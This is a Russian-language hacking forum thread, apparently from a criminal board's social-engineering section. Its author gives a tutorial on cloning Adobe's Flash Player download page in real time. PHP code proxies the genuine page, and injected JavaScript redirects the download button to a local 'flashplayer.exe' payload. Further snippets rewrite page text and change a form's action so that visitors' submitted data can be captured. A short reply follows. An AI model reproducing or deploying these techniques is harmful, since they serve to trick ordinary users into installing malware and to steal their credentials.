Загрузка...

Fake development technology

Thread in Social engineering created by Pwoned Apr 18, 2018. 286 views

  1. Pwoned
    Pwoned Topic starter Apr 18, 2018 1 Apr 18, 2018
    Впервые тема была мной размещена на эксплойте 6.07.2017, здесь же решил разместить её позднее.



    Информация может и не новая для кого либо, но я давно был заинтересован подобной подделкой.

    Сменилась информация на основном сайте ? - Меняется информация и на нашем фейке.



    Хотим сделать фейк обновления Flash Player, пишем следующий код:

    Code
    <?php



    $flash = file_get_contents ('https://get.adobe.com/flashplayer/'); //получаем страницу офф.сайта

    echo $flash;



    ?>



    <script type="text/javascript">

    document.getElementById("buttonDownload").href="flashplayer.exe";

    </script>


    До того как мы заюзали js, наша кнопка для скачивания плеера имела совсем другую ссылку, после того как мы использовали код который выше, ссылка на кнопке сменилась на "flashplayer.exe".

    Прошу заметить что наш фейк работает в режиме онлайн, функция file_get_contents парсит всю информацию с настоящего сайта, и только потом мы с помощью js меняем что нам нужно.



    Скриншот: [IMG]



    Тот же текст на нашей странице можно менять следующим методом:

    Code
    document.body.innerHTML = document.body.innerHTML.replace('Что нужно заменить', 'На что заменить');


    Скриншот: [IMG]



    Таким же макаром можно менять и action формы для вставки обработчика и получения чужих данных с формы.



    Что-то подобное:

    Code
    document.getElementById('form-id').attributes.action.value
     
    This article was useful for you?
    You can thank the author of the topic by transferring funds to your balance
    Thank the author
  2. KenKaneki_inactive216868
    KenKaneki_inactive216868 Apr 18, 2018 アレクサンドル イネイキン 211 Nov 26, 2017
    что то на иностраном языке, не понимать
     
Top
Loading...